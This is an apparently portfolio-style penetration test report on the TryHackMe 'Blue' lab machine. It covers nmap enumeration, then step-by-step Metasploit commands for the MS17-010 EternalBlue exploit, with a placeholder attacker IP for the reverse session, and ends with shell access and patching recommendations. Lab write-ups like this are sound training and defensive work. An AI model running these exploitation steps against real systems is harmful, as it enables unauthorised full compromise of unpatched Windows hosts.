Full Windows box analysis chaining enumeration, exploitation, and proof of concept. Demonstrates end to end analytical workflow and technical reporting.
# Penetration Test Report: TryHackMe Blue
## 1. Objective
The goal of this engagement was to assess the security posture of the TryHackMe “Blue” machine by identifying exposed services, validating known vulnerabilities, and gaining controlled access to the target. The focus was MS17-010 (EternalBlue), a critical SMB remote code execution flaw found in unpatched Windows 7 systems. This report documents reconnaissance, exploitation, and proof of compromise.
---
## 2. Target Information
**Target Host:** Blue
**IP Address:** 10.10.201.254
**Operating System:** Windows 7 Professional SP1
**Domain:** WORKGROUP
**Hostname:** JON-PC
---
## 3. Methodology
This assessment followed a simple penetration testing workflow:
1. Recon
2. Enumeration
3. Vulnerability Identification
4. Exploitation
5. Post-Exploitation Validation
All actions were completed within the authorized TryHackMe environment.
---
## 4. Recon and Enumeration
### 4.1 Nmap Scan
**Command:**
```bash
nmap -A 10.10.201.254
````
### Scan Summary
Nmap identified Windows 7 Professional SP1 with several open RPC ports and SMB. SMB signing was not required. The system profile matched known EternalBlue vulnerable hosts.
### Open Ports
| Port | State | Service | Notes |
| ----------- | ----- | ------------- | ----------------------- |
| 135/tcp | open | msrpc | Microsoft RPC |
| 139/tcp | open | netbios-ssn | NetBIOS session service |
| 445/tcp | open | microsoft-ds | SMB on Windows 7 SP1 |
| 3389/tcp | open | ms-wbt-server | RDP with SSL |
| 49152-49160 | open | msrpc | High-range MSRPC ports |
### Host Information Extracted
* OS: Windows 7 Professional SP1
* SMB signing: Not required
* Domain: WORKGROUP
* Hostname: JON-PC
* RDP certificate valid
* System time leaked
### Vulnerability Identified
**MS17-010 EternalBlue** confirmed through OS version, SMB posture, and fingerprinting.
---
## 5. Exploitation
### 5.1 Metasploit Module
**Exploit Used:**
`exploit/windows/smb/ms17_010_eternalblue`
### Steps Performed
1. Start Metasploit
```bash
msfconsole
```
2. Search and load the module
```bash
search eternalblue
use 0
```
3. Select the correct target
```bash
show targets
set TARGET 1
```
4. Set required options
```bash
set RHOSTS 10.10.201.254
set LHOST <attacker_IP>
```
5. Run the exploit
```bash
exploit
```
If the first attempt does not work, rerun it. A WIN message indicates success.
### 5.2 Post-Exploitation Access
Once the exploit succeeded, Metasploit opened a Meterpreter session.
To drop to a system shell:
```bash
shell
```
Successful access shows:
```
C:\Windows\system32>
```
This confirms full remote code execution.
---
## 6. Proof of Compromise
* Successful EternalBlue exploitation
* Meterpreter session established
* System-level shell access gained
* Direct file system interaction confirmed
This is full compromise of the target machine.
---
## 7. Impact Assessment
Compromising MS17-010 gives an attacker the ability to:
* Execute system-level code
* Install persistence
* Move laterally
* Extract credentials
* Disable defensive controls
In real environments this would be a critical threat.
---
## 8. Recommendations
1. Apply Microsoft MS17-010 patch.
2. Disable SMBv1 entirely.
3. Enable SMB signing.
4. Restrict SMB and RPC exposure at network boundaries.
5. Upgrade unsupported operating systems like Windows 7.
6. Implement regular vulnerability scanning and patch cycles.
---
## 9. Conclusion
The Blue machine is fully exploitable through the MS17-010 vulnerability. The attack path required minimal effort and resulted in complete system compromise. Proper patch management and SMB hardening would prevent this issue.
---